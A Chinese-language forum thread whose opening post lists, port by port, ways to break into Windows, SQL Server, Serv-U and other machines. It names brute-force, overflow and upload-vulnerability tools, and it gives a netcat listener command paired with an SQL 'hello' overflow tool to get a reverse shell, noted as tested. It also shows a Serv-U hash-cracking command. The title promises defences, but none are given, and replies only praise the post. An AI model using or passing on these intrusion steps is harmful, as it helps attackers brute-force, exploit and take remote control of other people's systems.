黑客入侵方法與工具防范

hidsov

工欲善其事，必先利其器，本文簡(jiǎn)單介紹目前黑客最常使用的一些入侵工具及防御的方法，以下是黑客入侵方法與工具防范。
1. 1433端口入侵
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
最后 SQLTools.exe入侵
對(duì)sql的sp2及以下的系統(tǒng)，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
(以上反向的，測(cè)試成功)
sqlhelloz.exe 入侵ip 1433 (這個(gè)是正向連接)
2. 4899端口入侵
用4899過(guò)濾器.exe，掃描空口令的機(jī)器
3. 3899的入侵
對(duì)很早的機(jī)器，可以試試3389的溢出
對(duì)2000的機(jī)器，可以試試字典暴破。
4. 80入侵
對(duì)sp3以前的機(jī)器，可以用webdav入侵;
對(duì)bbs論壇，可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(小榕的注入軟件)。
5. serv-u入侵(21端口)
對(duì)5. 004及以下系統(tǒng)，可用溢出入侵。(serv5004.exe)
對(duì)5.1.0.0及以下系統(tǒng)，可用本地提升權(quán)限。(servlocal.exe)
對(duì)serv-u的MD5加密密碼，可以用字典暴破。(crack.vbs)
輸入一個(gè)被serv-u加密的密碼(34位長(zhǎng))，通過(guò)與字典檔(dict.txt)的比較，得到密碼。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
    6. 554端口
用real554.exe入侵。
7. 6129端口
用DameWare6129.exe入侵。
8. 系統(tǒng)漏洞
利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，
進(jìn)行溢出入侵。
9. 3127等端口
可以利用doom病毒開(kāi)的端口，用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

linit

好的，頂你，收藏了嘻嘻

lduiy

這個(gè)問(wèn)題很有用，不錯(cuò)

出水嘩嘩

恩，我覺(jué)得值得學(xué)習(xí)啊，頂你